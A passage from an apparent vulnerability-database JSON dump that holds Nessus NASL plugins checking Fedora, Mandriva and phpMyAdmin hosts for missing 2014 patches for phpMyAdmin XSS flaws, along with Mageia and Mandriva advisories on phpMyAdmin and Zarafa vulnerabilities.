script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin 4.2.9.1 (2014-10-01) ===============================\n\n - [security] XSS vulnerabilities in table search and table\n structure pages\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1148664\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140407.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4844dde4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"phpMyAdmin-4.2.9.1-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:23", "description": "A vulnerability has been discovered and corrected in phpmyadmin :\n\nWith a crafted ENUM value it is possible to trigger an XSS in table search and table structure pages (CVE-2014-7217).\n\nThis upgrade provides the latest phpmyadmin version (4.2.9.1) to address this vulnerability.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-06T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:194)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:phpmyadmin", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-194.NASL", "href": "https://www.tenable.com/plugins/nessus/78061", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:194. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78061);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-7217\");\n script_bugtraq_id(70252);\n script_xref(name:\"MDVSA\", value:\"2014:194\");\n\n script_name(english:\"Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:194)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in phpmyadmin :\n\nWith a crafted ENUM value it is possible to trigger an XSS in table\nsearch and table structure pages (CVE-2014-7217).\n\nThis upgrade provides the latest phpmyadmin version (4.2.9.1) to\naddress this vulnerability.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-11.php\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpmyadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"phpmyadmin-4.2.9.1-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:22", "description": "phpMyAdmin 4.2.9.1 (2014-10-01) ===============================\n\n - [security] XSS vulnerabilities in table search and table structure pages\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-06T00:00:00", "type": "nessus", "title": "Fedora 20 : phpMyAdmin-4.2.9.1-1.fc20 (2014-12085)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-12085.NASL", "href": "https://www.tenable.com/plugins/nessus/78057", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-12085.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78057);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-7217\");\n script_bugtraq_id(70252);\n script_xref(name:\"FEDORA\", value:\"2014-12085\");\n\n script_name(english:\"Fedora 20 : phpMyAdmin-4.2.9.1-1.fc20 (2014-12085)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin 4.2.9.1 (2014-10-01) ===============================\n\n - [security] XSS vulnerabilities in table search and table\n structure pages\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1148664\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/139903.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9de4697a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"phpMyAdmin-4.2.9.1-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-04-16T14:05:40", "description": "According to its self-reported version number, the phpMyAdmin install hosted on the remote web server is 4.1.x prior to 4.1.14.1 or 4.2.x prior to 4.2.4. It is, therefore, affected by multiple cross-site scripting vulnerabilities.\n\nThe flaws exist due to user input not being validated in a crafted table name after a hide or unhide action. This could allow a remote attacker, with a specially crafted request, to execute arbitrary script code within the browser / server trust relationship.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-06-27T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.1.x < 4.1.14.1 / 4.2.x < 4.2.4 Navigation Hiding Items Multiple XSS (PMASA-2014-3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4349"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2014_3.NASL", "href": "https://www.tenable.com/plugins/nessus/76278", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76278);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-4349\");\n script_bugtraq_id(68205);\n\n script_name(english:\"phpMyAdmin 4.1.x < 4.1.14.1 / 4.2.x < 4.2.4 Navigation Hiding Items Multiple XSS (PMASA-2014-3)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by\nmultiple cross-site scripting vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the phpMyAdmin install\nhosted on the remote web server is 4.1.x prior to 4.1.14.1 or 4.2.x\nprior to 4.2.4. It is, therefore, affected by multiple cross-site\nscripting vulnerabilities.\n\nThe flaws exist due to user input not being validated in a crafted\ntable name after a hide or unhide action. This could allow a remote\nattacker, with a specially crafted request, to execute arbitrary\nscript code within the browser / server trust relationship.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-3.php\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/d4f754c937f9e2c0beadff5b2e38215dde1d6a79\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?536b65d4\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/daa98d0c7ed24b529dc5df0d5905873acd0b00be\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ddc55164\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either upgrade to phpMyAdmin 4.1.14.1 / 4.2.4 or later, or apply the\npatch from the referenced link.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/27\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_require_keys(\"www/PHP\", \"www/phpMyAdmin\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(appname:\"phpMyAdmin\", port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nurl = build_url(qs:dir, port:port);\n\nversion = install['ver'];\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"phpMyAdmin\", url);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (version =~ \"^4(\\.\\d+)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"phpMyAdmin\", port, version);\n\n# Affected version\n# 4.1.x < 4.1.14.1\n# 4.2.x < 4.2.4\n\nvuln = 0;\n\nre = make_array(-2, \"-beta(\\d+)\",\n -1, \"-rc(\\d+)\");\n\nif (version =~ \"^4\\.1\\.\")\n{\n fixed_ver = '4.1.14.1';\n\n if (\n ver_compare(ver:version, fix:\"4.1.0\", regexes:re) >= 0 &&\n ver_compare(ver:version, fix:fixed_ver, regexes:re) == -1\n ) vuln++;\n}\nif (version =~ \"^4\\.2\\.\")\n{\n fixed_ver = '4.2.4';\n\n if (\n ver_compare(ver:version, fix:\"4.2.0\", regexes:re) >= 0 &&\n ver_compare(ver:version, fix:fixed_ver, regexes:re) == -1\n ) vuln++;\n}\n\nif (vuln)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver +\n '\\n';\n security_note(port:port, extra:report);\n }\n else security_note(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"phpMyAdmin\", url, version);\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Updated zarafa packages fix security vulnerabilities: Robert Scheck reported that Zarafa's WebAccess stored session information, including login credentials, on-disk in PHP session files. This session file would contain a user's username and password to the Zarafa IMAP server (CVE-2014-0103). Robert Scheck discovered that the Zarafa Collaboration Platform has multiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448, CVE-2014-5449, CVE-2014-5450). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2014-09-22T08:31:24", "type": "mageia", "title": "Updated zarafa packages fix multiple vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0103", "CVE-2014-5447", "CVE-2014-5448", "CVE-2014-5449", "CVE-2014-5450"], "modified": "2014-09-22T08:31:24", "id": "MGASA-2014-0380", "href": "https://advisories.mageia.org/MGASA-2014-0380.html", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-18T11:19:34", "description": "In phpMyAdmin before 4.1.14.2, when navigating into the database triggers page, it is possible to trigger an XSS with a crafted trigger name (CVE-2014-4955). In phpMyAdmin before 4.1.14.2, with a crafted column name it is possible to trigger an XSS when dropping the column in table structure page. With a crafted table name it is possible to trigger an XSS when dropping or truncating the table in table operations page (CVE-2014-4986). In phpMyAdmin before 4.1.14.2, An unpriviledged user could view the MySQL user list and manipulate the tabs displayed in phpMyAdmin for them (CVE-2014-4987). \n", "cvss3": {}, "published": "2014-08-05T20:08:48", "type": "mageia", "title": "Updated phpmyadmin package fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4955", "CVE-2014-4986", "CVE-2014-4987"], "modified": "2014-08-05T20:08:48", "id": "MGASA-2014-0310", "href": "https://advisories.mageia.org/MGASA-2014-0310.html", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Updated phpmyadmin package fixes security vulnerabilities: In phpMyAdmin before 4.1.14.3, multiple XSS vulnerabilities exist in browse table, ENUM editor, monitor, query charts and table relations pages (CVE-2014-5273). In phpMyAdmin before 4.1.14.3, with a crafted view name it is possible to trigger an XSS when dropping the view in view operation page (CVE-2014-5274). \n", "cvss3": {}, "published": "2014-08-21T09:36:13", "type": "mageia", "title": "Updated phpmyadmin package fixes XSS vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2014-08-21T09:36:13", "id": "MGASA-2014-0344", "href": "https://advisories.mageia.org/MGASA-2014-0344.html", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Updated phpmyadmin package fixes security vulnerability: In phpMyAdmin before 4.1.14.4, by deceiving a logged-in user to click on a crafted URL, it is possible to perform remote code execution and in some cases, create a root account due to a DOM based XSS vulnerability in the micro history feature (CVE-2014-6300). \n", "cvss3": {}, "published": "2014-09-22T08:31:24", "type": "mageia", "title": "Updated phpmyadmin package fix CVE-2014-6300\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2014-09-22T08:31:24", "id": "MGASA-2014-0383", "href": "https://advisories.mageia.org/MGASA-2014-0383.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-04-18T11:19:34", "description": "In phpMyAdmin before 4.1.14.4, with a crafted ENUM value it is possible to trigger an XSS in table search and table structure pages (CVE-2014-7217). \n", "cvss3": {}, "published": "2014-10-07T09:22:51", "type": "mageia", "title": "Updated phpmyadmin package fixes security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-07T09:22:51", "id": "MGASA-2014-0402", "href": "https://advisories.mageia.org/MGASA-2014-0402.html", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Updated phpmyadmin packages fix security vulnerability: In phpMyAdmin before 4.1.14, it is possible to trigger an XSS when hiding or unhiding a crafted table name in the navigation, due to unescaped HTML output in the navigation items hiding feature. Note that this vulnerability can only be triggered by someone who logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required form (CVE-2014-4349). \n", "cvss3": {}, "published": "2014-06-27T15:03:09", "type": "mageia", "title": "Updated phpmyadmin packages fix CVE-2014-4349\n", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4349"], "modified": "2014-06-27T15:03:09", "id": "MGASA-2014-0275", "href": "https://advisories.mageia.org/MGASA-2014-0275.html", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-5450", "CVE-2014-0103", "CVE-2014-5447", "CVE-2014-5449", "CVE-2014-5448"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:182\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : zarafa\r\n Date : September 24, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Updated zarafa packages fix security vulnerabilities:\r\n \r\n Robert Scheck reported that Zarafa's WebAccess stored session\r\n information, including login credentials, on-disk in PHP session\r\n files. This session file would contain a user's username and password\r\n to the Zarafa IMAP server (CVE-2014-0103).\r\n \r\n Robert Scheck discovered that the Zarafa Collaboration Platform has\r\n multiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448,\r\n CVE-2014-5449, CVE-2014-5450).\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0103\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5447\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5448\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5449\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5450\r\n http://advisories.mageia.org/MGASA-2014-0380.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n b574e9d3829a2083e0ab6f18f0c03d6e mbs1/x86_64/lib64zarafa0-7.1.8-1.1.mbs1.x86_64.rpm\r\n 3428bccf076a0415a5fcd3a8711d954c mbs1/x86_64/lib64zarafa-devel-7.1.8-1.1.mbs1.x86_64.rpm\r\n 3008870b6138647ece3e000f36b6e964 mbs1/x86_64/php-mapi-7.1.8-1.1.mbs1.x86_64.rpm\r\n e40348366d018a89a729ee4301c957c4 mbs1/x86_64/python-MAPI-7.1.8-1.1.mbs1.x86_64.rpm\r\n 48d737652190a274fabdcf2f6d2718ff 